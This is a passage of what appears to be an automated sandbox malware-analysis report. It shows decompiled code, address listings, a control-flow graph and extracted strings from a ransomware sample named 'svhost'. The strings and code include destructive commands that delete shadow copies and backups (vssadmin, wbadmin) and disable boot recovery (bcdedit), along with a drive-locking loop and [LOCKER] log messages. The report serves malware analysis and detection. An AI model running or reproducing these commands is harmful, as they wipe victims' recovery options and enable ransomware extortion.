								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v476);
								E00E57B40( &_v476);
								E00E57CD0(_t335,  &_v500, _t492, _t493, __eflags, L"wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest");
								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v500);
								E00E57B40( &_v500);
								E00E57CD0(_t335,  &_v524, _t492, _t493, __eflags, L"wmic.exe SHADOWCOPY /nointeractive");
								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v524);
								_t235 = E00E57B40( &_v524);
								_t490 = _v236 + 1;
								__eflags = _t490;
								_v236 = _t490;
							}
							E00E6EA50(_t235,  &_v9);
							E00E55820(1);
							_t501 = _t500 + 4;
							E00E51100( &_v12);
							E00E515C0( &_v76, 0x18);
							E00E694E0( &_v76);
							E00E51100( &_v11);
							E00E515C0( &_v28, 0xc);
							E00E566A0( &_v28);
							E00E517B0(E00E51100( &_v248), L"[LOCKER] Run scanning...\n\n");
							while(1) {
								E00E515C0( &_v40, 0xc);
								E00E66BA0(_t335,  &_v12, _t492, _t493,  &_v40);
								_v280 =  &_v40;
								_v240 = E00E51BE0(_v280);
								_v296 = E00E51BF0(_v280);
								while(1) {
									_t480 = _v240;
									__eflags = _v240 - _v296;
									if(__eflags == 0) {
										break;
									}
									E00E57DE0(_t335,  &_v168, _t492, _t493, __eflags, _v240);
									E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v249), L"[LOCKER] Lock drive "),  &_v168), "\n");
									_t275 = E00E51650( &_v28);
									_t277 = E00E51650( &_v76);
									_t278 = E00E51650( &_v120);
									E00E558E0(_t335, _t492, _t493, _t513, E00E51650( &_v168), _t278, _t277, _t275);
									_t501 = _t501 + 0x20;
									E00E57B40( &_v168);
									_t423 = _v240 + 0x18;
									__eflags = _t423;
									_v240 = _t423;
								}
								E00E515C0( &_v52, 0xc);
								E00E6D590(_t335,  &_v11, _t480, _t492, _t493, __eflags,  &_v52, 0x64);
								_v276 =  &_v52;
								_v224 = E00E51BE0(_v276);
								_v300 = E00E51BF0(_v276);
								while(1) {
									__eflags = _v224 - _v300;
									if(__eflags == 0) {
										break;
									}
									E00E57DE0(_t335,  &_v216, _t492, _t493, __eflags, _v224);
									_t262 = E00E51650( &_v28);
									_t264 = E00E51650( &_v76);
									_t265 = E00E51650( &_v120);
									E00E558E0(_t335, _t492, _t493, _t513, E00E51650( &_v216), _t265, _t264, _t262);
									_t501 = _t501 + 0x20;
									E00E57B40( &_v216);
									_t484 = _v224 + 0x18;
									__eflags = _t484;
									_v224 = _t484;
								}
								E00E517B0(E00E51100( &_v250), L"[LOCKER] Sleep at 60 seconds...\n\n");
								Sleep(0xea60);
								E00E578B0( &_v52);
								E00E578B0( &_v40);
							}
						}
						E00E524A0(E00E517B0(E00E51100( &_v242), L"[LOCKER] Put ID to HTML-code is failed!\n"));
						_v316 = 0;
						E00E516F0(E00E654D0( &_v120),  &_v10);
					} else {
						E00E524A0(E00E517B0(E00E51100( &_v255), L"[LOCKER] Init cryptor is failed\n"));
						_v312 = 0;
						E00E516F0(E00E654D0( &_v120),  &_v10);
					}
				} else {
					E00E517B0(E00E51100( &_v252), L"[LOCKER] Is already running\n");
				}
				return E00E89A35(_t335, _v8 ^ _t494, _t475, _t492, _t493);
			}
































































































                                      0x00e55c70
                                      0x00e55c70
                                      0x00e55c70
                                      0x00e55c70
                                      0x00e55c70
                                      0x00e55c79
                                      0x00e55c80
                                      0x00e55c8a
                                      0x00e55c9f
                                      0x00e55ca4
                                      0x00e55cab
                                      0x00e55cac
                                      0x00e55cba
                                      0x00e55cc5
                                      0x00e55cdc
                                      0x00e55cec
                                      0x00e55cf8
                                      0x00e55cfd
                                      0x00e55d00
                                      0x00e55d0c
                                      0x00e55d1a
                                      0x00e55d3d
                                      0x00e55d45
                                      0x00e55d4d
                                      0x00e55d5d
                                      0x00e55d5f
                                      0x00e55d6d
                                      0x00e55d61
                                      0x00e55d61
                                      0x00e55d61
                                      0x00e55d77
                                      0x00e55d7d
                                      0x00e55d83
                                      0x00e55d97
                                      0x00e55d9c
                                      0x00e55da4
                                      0x00e55dbb
                                      0x00e55dcb
                                      0x00e55dd0
                                      0x00e55ddf
                                      0x00e55de1
                                      0x00e55e36
                                      0x00e55e46
                                      0x00e55e5b
                                      0x00e55e60
                                      0x00e55e70
                                      0x00e55e78
                                      0x00e55e7a
                                      0x00e55e88
                                      0x00e55e7c
                                      0x00e55e7c
                                      0x00e55e7c
                                      0x00e55e98
                                      0x00e55ea4
                                      0x00e55eaf
                                      0x00e55eb4
                                      0x00e55ebb
                                      0x00e55ebd
                                      0x00e55f03
                                      0x00e55f1a
                                      0x00e55f2a
                                      0x00e55f44
                                      0x00e55f4f
                                      0x00e55f66
                                      0x00e55f6e
                                      0x00e55f76
                                      0x00e55f8d
                                      0x00e55f95
                                      0x00e55fa4
                                      0x00e55fb5
                                      0x00e55fc6
                                      0x00e55fdd
                                      0x00e55fe3
                                      0x00e55fe9
                                      0x00000000
                                      0x00000000
                                      0x00e55ff8
                                      0x00e56009
                                      0x00e5600e
                                      0x00e56015
                                      0x00e5601d
                                      0x00e5601f
                                      0x00e56028
                                      0x00e5602d
                                      0x00e56034
                                      0x00e56034
                                      0x00e5603f
                                      0x00e55fd4
                                      0x00e55fd4
                                      0x00e55fd7
                                      0x00e55fd7
                                      0x00e56058
                                      0x00e56067
                                      0x00e56078
                                      0x00e56089
                                      0x00e560a0
                                      0x00e560a6
                                      0x00e560ac
                                      0x00000000
                                      0x00000000
                                      0x00e560bb
                                      0x00e560c7
                                      0x00e560cc
                                      0x00e560d3
                                      0x00e560de
                                      0x00e56097
                                      0x00e56097
                                      0x00e5609a
                                      0x00e5609a
                                      0x00e560e5
                                      0x00e56100
                                      0x00e56100
                                      0x00e56107
                                      0x00000000
                                      0x00000000
                                      0x00e56116
                                      0x00e56148
                                      0x00e56158
                                      0x00e56167
                                      0x00e56172
                                      0x00e56182
                                      0x00e56191
                                      0x00e5619c
                                      0x00e561ac
                                      0x00e561bb
                                      0x00e561c6
                                      0x00e561d6
                                      0x00e561e5
                                      0x00e561f0
                                      0x00e56200
                                      0x00e5620f
                                      0x00e5621a
                                      0x00e5622a
                                      0x00e56239
                                      0x00e56244
                                      0x00e560f7
                                      0x00e560f7
                                      0x00e560fa
                                      0x00e560fa
                                      0x00e56251
                                      0x00e56258
                                      0x00e5625d
                                      0x00e56263
                                      0x00e5626d
                                      0x00e56275
                                      0x00e5627d
                                      0x00e56287
                                      0x00e5628f
                                      0x00e562a6
                                      0x00e562ab
                                      0x00e562b0
                                      0x00e562bc
                                      0x00e562c4
                                      0x00e562d5
                                      0x00e562e6
                                      0x00e562fd
                                      0x00e562fd
                                      0x00e56303
                                      0x00e56309
                                      0x00000000
                                      0x00000000
                                      0x00e5631c
                                      0x00e5634d
                                      0x00e56356
                                      0x00e56363
                                      0x00e56370
                                      0x00e56389
                                      0x00e5638e
                                      0x00e56397
                                      0x00e562f4
                                      0x00e562f4
                                      0x00e562f7
                                      0x00e562f7
                                      0x00e563a6
                                      0x00e563b4
                                      0x00e563bc
                                      0x00e563cd
                                      0x00e563de
                                      0x00e563f5
                                      0x00e563fb
                                      0x00e56401
                                      0x00000000
                                      0x00000000
                                      0x00e56410
                                      0x00e56419
                                      0x00e56426
                                      0x00e56433
                                      0x00e5644c
                                      0x00e56451
                                      0x00e5645a
                                      0x00e563ec
                                      0x00e563ec
                                      0x00e563ef
                                      0x00e563ef
                                      0x00e56473
                                      0x00e5647d
                                      0x00e56486
                                      0x00e5648e
                                      0x00e5648e
                                      0x00e562ab
                                      0x00e55ed6
                                      0x00e55edb
                                      0x00e55ef0
                                      0x00e55de3
                                      0x00e55dfa
                                      0x00e55dff
                                      0x00e55e14
                                      0x00e55e19
                                      0x00e55d1c
                                      0x00e55d2e
                                      0x00e55d33
                                      0x00e564fd

                                      APIs
                                        • Part of subcall function 00E554B0: task.LIBCPMTD ref: 00E55525
                                      • std::locale::global.LIBCPMT ref: 00E55CAC
                                        • Part of subcall function 00E761D1: __EH_prolog3.LIBCMT ref: 00E761D8
                                        • Part of subcall function 00E761D1: std::locale::_Init.LIBCPMT ref: 00E761E9
                                        • Part of subcall function 00E761D1: std::_Lockit::_Lockit.LIBCPMT ref: 00E761FF
                                        • Part of subcall function 00E761D1: std::locale::_Setgloballocale.LIBCPMT ref: 00E7624E
                                        • Part of subcall function 00E761D1: std::_Lockit::~_Lockit.LIBCPMT ref: 00E762AE
                                        • Part of subcall function 00E55630: std::ios_base::good.LIBCPMTD ref: 00E55636
                                        • Part of subcall function 00E55630: OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 00E55652
                                        • Part of subcall function 00E55630: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00E55669
                                      • task.LIBCPMTD ref: 00E55D0C
                                      Strings
                                      • [LOCKER] Put ID to HTML-code is failed!, xrefs: 00E55EBF
                                      • [LOCKER] Scan hidden devices, xrefs: 00E55F54
                                      • [LOCKER] Stop and delete services, xrefs: 00E55F7B
                                      • [LOCKER] Add to autorun, xrefs: 00E55F08
                                      • wmic.exe SHADOWCOPY /nointeractive, xrefs: 00E5621F
                                      • {{IDENTIFIER}}, xrefs: 00E55E3B
                                      • [LOCKER] Put ID to HTML-code, xrefs: 00E55E24
                                      • [LOCKER] Kill processes, xrefs: 00E56046
                                      • {8761ABBD-7F85-42EE-B272-A76179687C63}, xrefs: 00E55CE1
                                      • p', xrefs: 00E55D77
                                      • [LOCKER] Is already running, xrefs: 00E55D1C
                                      • wbadmin DELETE SYSTEMSTATEBACKUP, xrefs: 00E561CB
                                      • [LOCKER] Init cryptor, xrefs: 00E55DA9
                                      • bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures, xrefs: 00E561A1
                                      • vssadmin.exe Delete Shadows /All /Quiet, xrefs: 00E5614D
                                      • svhost, xrefs: 00E55F1F
                                      • [LOCKER] Run scanning..., xrefs: 00E56294
                                      • [LOCKER] Is running, xrefs: 00E55CCA
                                      • wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest, xrefs: 00E561F5
                                      • [LOCKER] Sleep at 60 seconds..., xrefs: 00E56461
                                      • [LOCKER] Remove backups , xrefs: 00E56128
                                      • bcdedit.exe /set {default} recoveryenabled No, xrefs: 00E56177
                                      • [LOCKER] Init cryptor is failed, xrefs: 00E55DE3
                                      • [LOCKER] Lock drive , xrefs: 00E5632D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LockitMutexstd::_std::locale::_task$CreateH_prolog3InitLockit::_Lockit::~_OpenSetgloballocalestd::ios_base::goodstd::locale::global
                                      • String ID: [LOCKER] Add to autorun$[LOCKER] Init cryptor$[LOCKER] Init cryptor is failed$[LOCKER] Is already running$[LOCKER] Is running$[LOCKER] Kill processes$[LOCKER] Lock drive $[LOCKER] Put ID to HTML-code$[LOCKER] Put ID to HTML-code is failed!$[LOCKER] Remove backups $[LOCKER] Run scanning...$[LOCKER] Scan hidden devices$[LOCKER] Sleep at 60 seconds...$[LOCKER] Stop and delete services$bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures$bcdedit.exe /set {default} recoveryenabled No$p'$svhost$vssadmin.exe Delete Shadows /All /Quiet$wbadmin DELETE SYSTEMSTATEBACKUP$wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest$wmic.exe SHADOWCOPY /nointeractive${8761ABBD-7F85-42EE-B272-A76179687C63}${{IDENTIFIER}}
                                      • API String ID: 673517884-3686822622
                                      • Opcode ID: 4b7be7fad3db1b004673089a2ec90209d694685b4cefa6e9383e0541ac4ad584
                                      • Instruction ID: 94bc4994b1468a0cf6b90c40032f82e10f58e6e36656cfb12a74da27ece96eb4
                                      • Opcode Fuzzy Hash: 4b7be7fad3db1b004673089a2ec90209d694685b4cefa6e9383e0541ac4ad584
                                      • Instruction Fuzzy Hash: 96122F719101189BCB14EB60DC62BEDB3B5AF54342F4069E9A90A77192EF706F8DCF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64950 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 96%
                                      			E00E64950(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t59;
				void* _t63;
				char _t72;
				void* _t80;
				signed int _t128;

				_t127 = __esi;
				_t126 = __edi;
				_t91 = __ebx;
				_t59 =  *0xeef074; // 0x221cac15
				_v8 = _t59 ^ _t128;
				_v20 = __ecx;
				_t3 =  &_v20; // 0xe6344b
				_v16 = E00E51100( *_t3);
				_v24 =  *((intOrPtr*)(_v16 + 0x10));
				_t8 =  &_v20; // 0xe6344b
				_t63 = E00E596F0(__ebx,  *_t8, __edi, __esi, __eflags);
				_t135 = _t63 - _v24 - _a4;
				if(_t63 - _v24 < _a4) {
					E00E5BFD0();
				}
				_v32 = _v24 + _a4;
				_v40 =  *((intOrPtr*)(_v16 + 0x14));
				_t18 =  &_v20; // 0xe6344b
				_v36 = E00E5C0F0(_t91,  *_t18, _v32, _t126, _t127, _t135, _v32);
				_t20 =  &_v20; // 0xe6344b
				_v28 = E00E56580( *_t20);
				_t72 = E00E59B70(_v28, _t135,  ~(0 | _t135 > 0x00000000) | _v36 + 0x00000001); // executed
				_v12 = _t72;
				E00E516F0(_t72, _v16);
				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) {
					_t49 =  &_a12; // 0xe6344b
					E00E63460( &_a8, _v48, _v16, _v24,  *_t49 & 0x000000ff);
					_t80 = E00E51650(_v16);
					_t123 = _v28;
					E00E5B410(_v16, _v28, _t80,  &_v12);
				} else {
					asm("lfence");
					_v44 =  *_v16;
					_t39 =  &_a12; // 0xe6344b
					E00E63460( &_a8, _v48, E00E51650(_v44), _v24,  *_t39 & 0x000000ff);
					_t123 = _v44;
					E00E59BA0(_v28, _v44, _v40 + 1);
					 *_v16 = _v12;
				}
				return E00E89A35(_t91, _v8 ^ _t128, _t123, _t126, _t127);
			}



















                                      0x00e64950
                                      0x00e64950
                                      0x00e64950
                                      0x00e64956
                                      0x00e6495d
                                      0x00e64960
                                      0x00e64963
                                      0x00e6496b
                                      0x00e64974
                                      0x00e64977
                                      0x00e6497a
                                      0x00e64982
                                      0x00e64985
                                      0x00e64987
                                      0x00e64987
                                      0x00e64992
                                      0x00e6499b
                                      0x00e649a2
                                      0x00e649aa
                                      0x00e649ad
                                      0x00e649b5
                                      0x00e649cb
                                      0x00e649d0
                                      0x00e649d6
                                      0x00e649e1
                                      0x00e649ea
                                      0x00e649f9
                                      0x00e64a00
                                      0x00e64a4c
                                      0x00e64a60
                                      0x00e64a6d
                                      0x00e64a76
                                      0x00e64a7a
                                      0x00e64a02
                                      0x00e64a02
                                      0x00e64a0a
                                      0x00e64a0d
                                      0x00e64a2a
                                      0x00e64a36
                                      0x00e64a3d
                                      0x00e64a48
                                      0x00e64a48
                                      0x00e64a92

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E649CB
                                      • allocator.LIBCONCRTD ref: 00E64A3D
                                      • construct.LIBCPMTD ref: 00E64A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: K4$K4
                                      • API String ID: 3172100163-3966304769
                                      • Opcode ID: 75d0b7653116b169471395592672fe65f46befa8c584f95660ddaf1038cb590f
                                      • Instruction ID: eaa449a796f715aa80282647604fc37fa994727f7819601998aaa9429cde6e30
                                      • Opcode Fuzzy Hash: 75d0b7653116b169471395592672fe65f46befa8c584f95660ddaf1038cb590f
                                      • Instruction Fuzzy Hash: A441B7B5E00109AFCB08DFA8D8919EEB7F5FF88301F149569E915B7351DB30AA04CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EAE980 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 345 eae980-eae9a1 call eb0559 348 eaeabe-eaeac1 345->348 349 eae9a7-eae9db call eae8bc 345->349 352 eae9de-eae9f3 call ea5920 349->352 355 eae9f9-eaea06 352->355 356 eaeb0e-eaeb44 call ea4980 352->356 357 eaea09-eaea0f 355->357 368 eaeb46-eaeb48 356->368 369 eaeb67-eaeb83 356->369 359 eaea2f-eaea31 357->359 360 eaea11-eaea14 357->360 364 eaea34-eaea6e call eae8bc 359->364 362 eaea2b-eaea2d 360->362 363 eaea16-eaea1e 360->363 362->364 363->359 366 eaea20-eaea29 363->366 364->352 380 eaea74-eaea78 364->380 366->357 366->362 373 eaeb5a-eaeb62 368->373 374 eaeb4a-eaeb55 call eaee0b 368->374 370 eaeb89-eaeb8d 369->370 371 eaede3-eaede4 call eae980 369->371 378 eaecfb-eaed22 call eae4f6 370->378 379 eaeb93-eaeb98 370->379 385 eaede9 371->385 376 eaedea-eaedf8 call e89a35 373->376 374->376 378->376 394 eaed28-eaed2f 378->394 379->378 386 eaeb9e-eaeba3 379->386 381 eaea7a-eaea82 380->381 382 eaeac2-eaead1 call eb051f 380->382 389 eaea84-eaea8a 381->389 390 eaea95-eaea9a 381->390 400 eaead3-eaead9 382->400 401 eaeae4-eaeae9 382->401 385->376 386->378 393 eaeba9-eaebc0 call eb84c6 386->393 389->390 395 eaea8c-eaea94 call eb051f 389->395 396 eaeaac-eaeaba 390->396 397 eaea9c-eaeaa1 390->397 408 eaebc6-eaebd0 393->408 409 eaecf4-eaecf6 393->409 403 eaed35-eaed37 394->403 395->390 406 eaeabd 396->406 397->396 405 eaeaa3-eaeaab call eb051f 397->405 400->401 407 eaeadb-eaeae3 call eb051f 400->407 413 eaeafb-eaeb0c 401->413 414 eaeaeb-eaeaf0 401->414 410 eaedbe 403->410 411 eaed3d-eaed3f 403->411 405->396 406->348 407->401 408->409 417 eaebd6-eaebdc 408->417 409->376 418 eaedc4-eaedd1 410->418 419 eaed45-eaed51 411->419 413->406 414->413 420 eaeaf2-eaeafa call eb051f 414->420 417->409 423 eaebe2-eaebed 417->423 418->403 424 eaedd7-eaedd9 418->424 425 eaed53-eaed57 419->425 426 eaed86-eaed8b 419->426 420->413 428 eaebf7-eaec05 call eb0488 423->428 424->371 429 eaeddb-eaeddd 424->429 430 eaed59-eaed6e 425->430 431 eaed80-eaed84 425->431 433 eaed8d-eaed8f 426->433 441 eaec23-eaec32 428->441 442 eaec07-eaec09 428->442 429->371 435 eaeddf-eaede1 429->435 430->426 436 eaed70-eaed7e 430->436 431->433 437 eaedbd 433->437 438 eaed91-eaedaa call eaee0b 433->438 435->376 436->419 436->431 437->410 446 eaedac-eaedaf 438->446 447 eaedb1-eaedbb 438->447 441->428 445 eaec34-eaec54 call eb846d 441->445 444 eaec0c-eaec19 442->444 444->444 448 eaec1b-eaec21 444->448 451 eaec62-eaec69 445->451 452 eaec56-eaec5c 445->452 446->410 447->418 448->441 448->445 453 eaecca 451->453 454 eaec6b-eaec83 call eafafc 451->454 452->409 452->451 456 eaecd0-eaecdb 453->456 460 eaec89-eaec91 454->460 461 eaedfe-eaee0a call ea4980 454->461 458 eaecdd-eaece0 456->458 459 eaece3-eaece6 456->459 458->459 459->393 462 eaecec-eaecee 459->462 463 eaedf9 call e89ffe 460->463 464 eaec97-eaecbf call eaee0b 460->464 462->371 462->409 463->461 464->456 470 eaecc1-eaecc8 464->470 470->456
                                      C-Code - Quality: 78%
                                      			E00EAE980(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t244;
				signed int _t246;
				void* _t249;
				signed int _t252;
				signed int _t254;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t267;
				signed int _t269;
				void* _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				signed int _t286;
				signed int _t289;
				signed int _t290;
				intOrPtr _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t300;
				signed int _t302;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t337;
				void* _t339;
				signed int _t341;
				void* _t342;
				intOrPtr _t343;
				signed int _t348;
				signed int _t349;
				intOrPtr* _t354;
				signed int _t368;
				signed int _t370;
				void* _t371;
				signed int _t372;
				intOrPtr* _t373;
				signed int _t375;
				void* _t376;
				void* _t380;
				intOrPtr* _t385;
				intOrPtr* _t388;
				void* _t391;
				signed int _t392;
				signed int _t395;
				intOrPtr* _t396;
				char* _t403;
				signed int _t405;
				intOrPtr _t408;
				intOrPtr* _t409;
				signed int _t411;
				signed int* _t415;
				signed int _t416;
				intOrPtr* _t422;
				intOrPtr* _t423;
				signed int _t432;
				short _t433;
				signed int _t435;
				intOrPtr _t436;
				void* _t437;
				signed int _t439;
				intOrPtr _t440;
				void* _t441;
				signed int _t442;
				signed int _t445;
				intOrPtr _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				signed int _t455;
				void* _t457;
				signed int _t459;
				signed int _t461;
				signed int _t464;
				signed int* _t465;
				intOrPtr* _t466;
				short _t467;
				signed int _t469;
				signed int _t470;
				void* _t472;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				signed int _t477;
				void* _t479;
				void* _t480;
				signed int _t492;

				_t431 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t244 = E00EB0559(0x6a6); // executed
				_t368 = _t244;
				_t245 = 0;
				_pop(_t380);
				if(_t368 == 0) {
					L20:
					return _t245;
				} else {
					_push(__edi);
					_t2 = _t368 + 4; // 0x4
					_t435 = _t2;
					 *_t435 = 0;
					 *_t368 = 1;
					_t451 = _a4;
					_t246 = _t451 + 0x30;
					_push( *_t246);
					_v16 = _t246;
					_push(0xecb080);
					_push( *0xecafbc);
					E00EAE8BC(_t368, _t380, _t435, _t451, _t435, 0x351, 3);
					_t473 = _t472 + 0x18;
					_v8 = 0xecafbc;
					while(1) {
						L2:
						_t249 = E00EA5920(_t435, 0x351, 0xecb07c);
						_t474 = _t473 + 0xc;
						if(_t249 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t422 = _t8;
							_t348 =  *_v16;
							_v16 = _t422;
							_t423 =  *_t422;
							_v20 = _t423;
							goto L4;
						}
						while(1) {
							L4:
							_t431 =  *_t348;
							if(_t431 !=  *_t423) {
								break;
							}
							if(_t431 == 0) {
								L8:
								_t349 = 0;
							} else {
								_t431 =  *((intOrPtr*)(_t348 + 2));
								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
									break;
								} else {
									_t348 = _t348 + 4;
									_t423 = _t423 + 4;
									if(_t431 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xecb080);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t349);
							_t354 = _v8 + 0xc;
							_v8 = _t354;
							_push( *_t354);
							E00EAE8BC(_t368, _t423, _t435, _t451, _t435, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0xecafec) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00EB051F(_t368);
									_t442 = _t435 | 0xffffffff;
									__eflags =  *(_t451 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00EB051F( *(_t451 + 0x28));
										}
									}
									__eflags =  *(_t451 + 0x24);
									if( *(_t451 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t442 == 1;
										if(_t442 == 1) {
											E00EB051F( *(_t451 + 0x24));
										}
									}
									 *(_t451 + 0x24) = 0;
									 *(_t451 + 0x1c) = 0;
									 *(_t451 + 0x28) = 0;
									 *((intOrPtr*)(_t451 + 0x20)) = 0;
									_t245 =  *((intOrPtr*)(_t451 + 0x40));
								} else {
									_t445 = _t435 | 0xffffffff;
									_t492 =  *(_t451 + 0x28);
									if(_t492 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t492 == 0) {
											E00EB051F( *(_t451 + 0x28));
										}
									}
									if( *(_t451 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t445 == 1) {
											E00EB051F( *(_t451 + 0x24));
										}
									}
									 *(_t451 + 0x24) =  *(_t451 + 0x24) & 0x00000000;
									_t28 = _t368 + 4; // 0x4
									_t245 = _t28;
									 *(_t451 + 0x1c) =  *(_t451 + 0x1c) & 0x00000000;
									 *(_t451 + 0x28) = _t368;
									 *((intOrPtr*)(_t451 + 0x20)) = _t245;
								}
								goto L20;
							}
							goto L136;
						}
						asm("sbb eax, eax");
						_t349 = _t348 | 0x00000001;
						__eflags = _t349;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00EA4980();
					asm("int3");
					_t469 = _t474;
					_t475 = _t474 - 0x1d0;
					_t252 =  *0xeef074; // 0x221cac15
					_v60 = _t252 ^ _t469;
					_t254 = _v44;
					_push(_t368);
					_push(_t451);
					_t452 = _v40;
					_push(_t435);
					_t436 = _v48;
					_v512 = _t436;
					__eflags = _t254;
					if(_t254 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t370 = 0;
						_v452 = 0;
						__eflags = _t452;
						if(__eflags == 0) {
							L80:
							E00EAE980(_t370, _t431, _t436, _t452, __eflags, _t436); // executed
							goto L81;
						} else {
							__eflags =  *_t452 - 0x4c;
							if( *_t452 != 0x4c) {
								L60:
								_t261 = E00EAE4F6(_t370, _t431, _t436, _t452, _t452,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t476 = _t475 + 0x18;
								__eflags = _t261;
								if(_t261 != 0) {
									__eflags = 0;
									_t432 = _t436 + 0x20;
									_t454 = 0;
									_v452 = _t432;
									do {
										__eflags = _t454;
										if(_t454 == 0) {
											L75:
											_t262 = _v460;
										} else {
											_t385 =  *_t432;
											_t263 =  &_v276;
											while(1) {
												__eflags =  *_t263 -  *_t385;
												_t436 = _v464;
												if( *_t263 !=  *_t385) {
													break;
												}
												__eflags =  *_t263;
												if( *_t263 == 0) {
													L68:
													_t264 = 0;
												} else {
													_t433 =  *((intOrPtr*)(_t263 + 2));
													__eflags = _t433 -  *((intOrPtr*)(_t385 + 2));
